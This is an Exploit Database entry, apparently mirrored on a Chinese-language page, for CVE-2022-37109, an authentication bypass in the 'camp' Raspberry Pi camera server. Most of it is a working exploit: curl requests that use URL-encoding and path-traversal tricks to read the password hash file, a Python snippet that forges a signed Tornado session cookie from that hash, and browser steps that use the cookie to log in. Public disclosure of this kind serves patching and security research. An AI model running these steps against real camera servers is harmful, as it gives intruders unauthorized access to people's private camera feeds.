“camp” Raspberry Pi camera server 1.0 – Authentication Bypass

• Exploit Database
• 45 阅读

• 作者： Elias Hohl
  日期： 2023-03-25
• 类别：

  • webapps
  平台：

  • Python
• 来源：https://www.exploit-db.com/exploits/51041/

• # Exploit Title: "camp" Raspberry Pi camera server 1.0 -Authentication Bypass
  # Date: 2022-07-25
  # Exploit Author: Elias Hohl
  # Vendor Homepage: https://github.com/patrickfuller
  # Software Link: https://github.com/patrickfuller/camp
  # Version: < bf6af5c2e5cf713e4050c11c52dd4c55e89880b1
  # Tested on: Ubuntu 20.04
  # CVE : CVE-2022-37109
  
  "camp" Raspberry Pi camera server Authentication Bypass vulnerability
  
  https://medium.com/@elias.hohl/authentication-bypass-vulnerability-in-camp-a-raspberry-pi-camera-server-477e5d270904
  
  1. Start an instance of the "camp" server:
  python3 server.py --require-login
  
  2. Fetch the SHA-512 password hash using one of these methods:
  
  curl http://localhost:8000/static/password.tx%74
  
  OR
  
  curl http://localhost:8000/static/./password.txt --path-as-is
  
  OR
  
  curl http://localhost:8000/static/../camp/password.txt --path-as-is
  
  3. Execute the following python snippet (replace the hash with the hash you received in step 2).
  
  from tornado.web import create_signed_value
  import time
  print(create_signed_value("5895bb1bccf1da795c83734405a7a0193fbb56473842118dd1b66b2186a290e00fa048bc2a302d763c381ea3ac3f2bc2f30aaa005fb2c836bbf641d395c4eb5e", "camp", str(time.time())))
  
  4. In the browser, navigate to http://localhost:8000/, add a cookie named "camp" and set the value to the result of the script from step 3, then reload the page. You will be logged in.